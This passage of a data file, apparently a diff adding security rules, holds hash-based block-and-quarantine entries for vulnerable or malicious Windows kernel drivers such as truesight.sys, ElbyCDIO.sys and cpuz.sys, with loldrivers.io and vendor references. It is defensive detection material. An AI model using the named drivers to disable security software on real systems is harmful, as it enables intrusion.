"bedb25c95cead7deb60ef18c753b65131d9b7dcd13846f09b011060042586213", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4ba330da-f486-56c3-a23b-ee1132d31427", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.973199Z", + "creation_date": "2026-03-23T11:45:29.973201Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.973206Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "911541d26b605a97ba099563b9eb7e027c102f139dba5884a57df5a13cf3dcef", + "comment": "Elaborate Bytes vulnerable driver (aka ElbyCDIO.sys) [CVE-2009-0824] [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4ba8babe-5961-5ccf-881d-7aed197ac336", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + 
"origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.985759Z", + "creation_date": "2026-03-23T11:45:29.985761Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.985766Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4cfd9cb41a51b1e1fdfc9a6855323bf11a0baf18e5d8f0ee7480a8cb5be7c8ac", + "comment": "Malicious Kernel Driver (aka malicious.sys) [https://github.com/zeze-zeze/CYBERSEC2023-BYOVD-Demo] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4bbecbf8-c13c-5415-a5c7-60f788426a9a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.156997Z", + "creation_date": "2026-03-23T11:45:31.156999Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.157004Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2ca407794a31a010d4cad09311293244c19607ac903d7c06c4e85e5e452af300", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4bc18ecb-5e36-5ec2-8c56-04096fed71a8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.476554Z", + "creation_date": "2026-03-23T11:45:30.476558Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.476567Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ae85245fcb873d6fbf61f1923b8c10f0680abeaf2bf5527aef1c4a52aae321d0", + "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4bc21be2-c347-5872-b3f0-85636c24a00c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.482058Z", + "creation_date": "2026-03-23T11:45:31.482061Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:31.482072Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "27576ab7a5003133e73f00e870ea29ba6fa07f886f56f9377df2fc02640dd6b4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4bc4daf3-3cf9-5b5d-8177-ea685cb64019", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.495261Z", + "creation_date": "2026-03-23T11:45:31.495264Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.495272Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1c74d5481c6de4b5020637777fd8ee8bf5d9a97bcfe15159594ae7af949a46e1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4bc87a01-5524-57e3-a5ee-19b10f1f013a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": 
"quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.144092Z", + "creation_date": "2026-03-23T11:45:32.144094Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.144100Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3855b2df32e0eedec454b25e6e2da6b3df19c4b0f575e45bc06482d4ebce7551", + "comment": "Malicious Kernel Driver (aka idmtdi.sys) [https://www.loldrivers.io/drivers/c2e98102-2055-48f0-9449-3e7a7f2c0ffe/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4bd8e88e-50de-5d20-9b51-c5ae8cb2a7f8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.832223Z", + "creation_date": "2026-03-23T11:45:30.832225Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.832231Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"2511804c17a1224866da91f3b65105acbcb11e7b7b1fcc1e29609194a95df406", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4bdf2800-5255-50dd-9855-5b79ff1f718c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.160363Z", + "creation_date": "2026-03-23T11:45:31.160365Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.160370Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "88bcd2c1f5e17bee1a61bdc85d7226ee5e90c7728460e83df3108ccb5158bddb", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4bede8e0-e151-52ed-bb67-75c6633c271f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.826156Z", + "creation_date": "2026-03-23T11:45:31.826158Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.826163Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7ba13222e25b49a99d01019af0f1378b0003cd71ae72b1ec7f512b269e86ec83", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4bf060b2-e23f-5480-be63-6f8ed10409ec", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.809494Z", + "creation_date": "2026-03-23T11:45:31.809496Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.809504Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "afce06fe02c7c628be20bb7dd578659e94032a21f29ba7355a82381a3470c714", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware 
Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4bf11efa-0f09-51b7-8ce3-5bfb70b71d45", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.828654Z", + "creation_date": "2026-03-23T11:45:31.828656Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.828662Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4bbf8808277c2ef684de28e5bae57b9e230203b6b2cb66539cabdba0b0ecfad8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4bf54704-8255-512c-8fd5-e9955052c367", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:30.478800Z", + "creation_date": "2026-03-23T11:45:30.478804Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.478813Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0e121d80264c51df9a6fca2f2201d75ccd4dc29d9566bbf0975bb05759e9c6c7", + "comment": "Vulnerable Kernel Driver (aka Tmel.sys) [https://www.loldrivers.io/drivers/1aeb1205-8b02-42b6-a563-b953ea337c19/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4c13e5ba-205d-5f87-8372-56794702a727", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.147350Z", + "creation_date": "2026-03-23T11:45:31.147352Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.147357Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f3674adfa8151ac0100793e988aec708b0e8a2ca155226c140d7885476f971e1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"4c3181cd-bf78-5b6e-b273-cd3600bc8102", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.148242Z", + "creation_date": "2026-03-23T11:45:31.148244Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.148249Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a41dc1a32edc8073ee13dee590762343acd252a29d1eddc77bb8faeac52a3fea", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4c326e83-7946-5af6-ae18-19a9c97600ac", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.835434Z", + "creation_date": "2026-03-23T11:45:30.835437Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:30.835446Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "88f52739de1bc336101fdc25aa7e82cbe497c0413993ba4b9ed387a588d7f1c2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4c3e2f13-067d-5240-a3d4-e5cdd9687e46", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.141139Z", + "creation_date": "2026-03-23T11:45:31.141141Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.141150Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a73c288bd1f33f7c56d184588d072a3f548f31cfb5b48e1c53e1beb433cee2b2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4c41e7e2-ef7d-5c2b-9e6e-b88b58526868", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": 
"quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.825799Z", + "creation_date": "2026-03-23T11:45:30.825801Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.825807Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "824370a49c9fbec55d79723417b9a97abbd613ed04e796a46ed7dc7a00bf1145", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4c422499-0305-50f8-94ae-1702d73c93a9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.808211Z", + "creation_date": "2026-03-23T11:45:31.808214Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.808223Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3ee0dde4515bdb59defb7cc0fc31c0b04a7d72c81c42bde05a5694a7d3ff8f83", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4c42c62d-ad6d-557b-8f6d-2a11ba7f309d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.972629Z", + "creation_date": "2026-03-23T11:45:29.972631Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.972636Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ef6d3c00f9d0aa31a218094480299ef73fc85146adf62fd0c2f4f88972c5c850", + "comment": "TG Soft vulnerable driver (aka viragt.sys and viragt64.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4c43dbdf-1e8f-524e-a477-a86d93d47218", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.499055Z", + "creation_date": "2026-03-23T11:45:31.499058Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.499067Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "15718b07267354eb5d30fa8ab0903b013af854303b7def4981724715fcfacdb3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4c5f353f-0b0f-5f7e-8104-78eb4a923c3b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.818278Z", + "creation_date": "2026-03-23T11:45:30.818280Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.818285Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"db0d425708ba908aedf5f8762d6fdca7636ae3a537372889446176c0237a2836", + "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4c60f1ff-c593-5a69-9093-b120146da657", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.141750Z", + "creation_date": "2026-03-23T11:45:31.141752Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.141757Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0e42df3a98ebb36cf1d90f71fd179625cded05c29519e6322a4bef1b06b3f685", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4c6dcf3b-6e07-5678-b802-c37b99f787c6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.973252Z", + "creation_date": "2026-03-23T11:45:29.973254Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.973259Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e85d36ca271c4d65abc1cdfff0e629dc5d14edb5bf97669badbb40d2715c1d47", + "comment": "Elaborate Bytes vulnerable driver (aka ElbyCDIO.sys) [CVE-2009-0824] [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4c704d4f-f6b5-57d4-bda8-b5903e870bcd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 